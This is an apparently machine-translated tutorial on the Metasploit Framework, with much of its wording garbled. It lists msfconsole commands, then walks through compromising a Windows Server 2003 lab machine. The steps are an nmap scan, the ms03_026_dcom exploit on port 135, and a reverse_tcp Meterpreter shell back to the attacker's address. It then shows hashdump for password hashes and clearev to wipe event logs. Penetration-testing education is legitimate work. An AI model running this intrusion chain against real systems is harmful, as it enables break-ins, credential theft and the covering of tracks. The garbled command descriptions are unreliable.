Penetration Testing With The Metasploit Framework
When you think "penetration testing tool"
first thing that comes to mind is the
Ruby world's largest project, with more than
700 000 lines of code "Metasploit". Not
wonder it has become the de-facto standard for
for penetration testing and vulnerability
development with more than one million
Unique downloads per year, and the world "s
largest database of quality-assured public
Metasploit Framework is a program
and the sub-project, developed by Metasploit
LLC. It was originally established in 2003
Perl programming language, but was then
completely rewritten in Ruby
Programming language. With most
recent release (3.7.1) took Metasploit
the use of testing and simulation of a complete
to the next level, which is a muscled out of high
Prices for commercial counterparts
speeding up and mortality, and Code
advantage of the shortest possible time.
Working with Metasploit
Metasploit is easy to use and is designed to
ease of use in mind to support Penetration
Tester. I'll take you through this
BackTrack show at 5, then go for it
download if not already done so -
org / downloads /. The reason for using
BackTrack 5 is because it has the right
Metasploit Framework has three work
msfconsole environments, msfcli
interface and the interface msfweb.
However, the main and most
Workspace favorite is the "msfconsole." There
a powerful command line interface, which is
its own set of commands and the environment
Before you used to run, it is useful
understand what some Metasploit
commands do. Some of
used commands. Graphic
a description of their outputs should
provided that we use while
some of the boxes in the next part of this article.
i) Research <keyword> : Enter the
command "find" with the
lists the various keywords
exploits that have the potential
ii) benefit show: Writing
"Show exploits" on the order lists
exploits currently available.
Is to use a different remote
platforms and applications, including
Windows, Linux, IIS, Apache, etc.
one that will test the flexibility
and understand how
iii) show load: With the same "show"
command, you can also list
payloads available. We can use a
"The charges show 'from the list of charges.
iv) shows the possibilities: to write
Show View Options command displays
You options you have defined and
Perhaps those who may have
He forgot to specify. Each operation and
Payload comes with its own possibilities
can be defined.
v) info <type><name> : If you want to
specific information about an exploit or
payload, you can use the 'info'
control. Let 's say we want
Info full load
"Winbind". We can use the
"Winbind support Info '.
vi) use <exploit_name> This command
Metasploit exploit words with
with the specified name.
vii) to rhosts <hostname_or_ip> :
This order indicates
Metasploit defined objective
viii) to RPORT <host_port> This
command specifies the port
Metasploit will connect
ix) Insert the payload
command sets the payload is
are exploited to give the target
shell, when the service is
x) Thurs LPORT <local_port> This
command sets the port number
payload on the server opens
when an exploit is executed. There
important that this port is
port can be opened in
Server (EIT are not used by another
service and not reserved for
administrative purposes), so set
random 4-digit number above
1024, and you should be fine. You "ll
have to change the number of each
Once successfully exploit
service as well.
xi) to take advantage: In fact, use the service.
Another version of the exploit, rexploit
Recharge your exploit code and
makes use. This gives you
experiment with small changes to exploit
Code without having to restart the console.
xii) to help: "help" command to give
basic information of all
commands that are not listed
Now you are ready for any base
Commands must start at their own convenience,
Let 's get to choose a couple of scenarios
remotely control the machine.
Victim's computer: -
Operating System: Microsoft Windows Server 2003
IP: IP: 192.168.42.129
Striker (Our) machine: -
OS: BackTrack 5
Kernel version: Linux 2.6.38 # 1 SMP BT
Thursday, March 17, 2011 8:52:18 PM EDT i686
GNU / Linux
Metasploit Version: Built in version
Metasploit Version: Built in version
The only information we have about
the remote server is that Windows
Server 2003, and the aim is to get
Shell access to server.
The detailed steps:
An analysis of nmap on the remote server
Starting Nmap scan will show us
range of open ports.
In your copy of BackTrack, go to:
Application - BackTrack - Exploitation
Tools - network operations
Msfconsole Metasploit Framework
During initialization, msfconsole,
standard checks performed. If
all is well.
We now know that port 135 is open,
Search for an exploit related to RPC
Metasploit. To list all the advantages of
Show supports the use Metasploit '
exploits "command. This achievement shows all
currently available exploits.
As you may have noticed, the default
installation of the Metasploit Framework
3.8.0-dev comes with 696 exploits, 224
payload, which is quite impressive
warehouse to find a special benefit from
this great list would be a daunting task proportions.
So we use the best option. You can connect or another http://metasploit.com/modules/
alternative is to use research "
<keyword> "The command is Metasploit
for weaknesses related to the PRC.
In type msfconsole "DCERPC Search" to
Find all achievements related DCERPC
keywords that exploits can be used to gain
access to a vulnerable server port
135. List of all the associated benefits would be
Now that is the list of RPC vulnerabilities
in front of you, we would need more
information about the vulnerability before
actually use it. For more information
You can use the advantage of
DCOM "providing information, such as
destinations available, usage requirements,
details of the vulnerability itself, and also
references where you can find more
The command "use <exploit_name> "
active exploit the environment for
exploit <exploit_name> . In our case, we
use the "use
DCOM "for our exploit.
DCOM "system changes
"MSF->" and "The MSF
exploit (ms03_026_dcom)> "which
symbolizes the fact that we have entered a
Temporary operating environment.
Now, we have decided to use towards the
need for the current situation. "Show
options "command shows different
parameters required to
exploit to function properly. In our case,
RPORT is already set to 135 and only
opportunity to be together is that you can set rhost
using the "set rhost" command.
We will give "rhost command in September
192.168.42.129 "and we see that rhosts
is set to 192.168.42.129.
The only step left now, before we
Use set to launch a payload for the
used. We can look at all available
the payload using the "see charges"
In this case, we use the inverse tcp
meterpreter that can be set
command "Set the payload
Windows / Meterpreter / reverse_tcp "
that generates a shell, if the remote server is
successfully exploited. Now, again, it is necessary
display the available options using the show "
options "to ensure that all mandatory
parts are properly filled, so that
benefit from starting correctly.
We note that the payload is LHOST
has not been resolved, so we started saying local IP.
192.168.42.128 "set of commands
LHOST 192.168.42.128 ".
Now everything is ready and exploitation
is properly configured, it is time to
Use the "check" command to check
if the victim's computer is vulnerable to
the advantage or not. This option is not present
for all operators, but can be a real good
support system before you use the
the remote server to ensure the remote control
server is not patched against the exploitation
In this case, our exploit is not compatible with the selected
Command "Leverage" actually begins in
attack, do what you must do to
the load has been executed on the remote
successfully executed against the distance
the machine due to 192.168.42.129
vulnerable port 135 This can be seen
instead ask for "Meterpreter>".
Now is an inverse relationship
configuration between the victim and our machine
have full control of the server. Us
can use "help" command to see what all
commands can be used by us in the remote control
server to perform related actions.
Below is the result of some of
Meterpreter orders: -
"ipconfig" transcripts remote
machines of all current TCP / IP
the network settings
"getuid" print server ID
"hashdump" dumps the contents of
"clearev" can be used to remove all
tracks that have never been
We have successfully used Metasploit
Remote connection to break
Windows 2003 Server, and get a shell
that can be controlled remotely
machine and perform any
activities according to our desires.
The potential uses Metasploit
1) Metasploit can be used to
penetration testing to confirm the reports of
other automated vulnerability assessment
tools to prove that the vulnerability is not a
false positives and can be used. Particular care has
faced not only because it refutes
false positives, but it can also break things.
2) Metasploit can be used to test new
feats that occur almost every day
Their local host test servers
understand the effectiveness of the exploit.
3) The Metasploit is also a great test
Their intrusion detection systems to test
if the IDS is successful in preventing
attacks that we ignore it.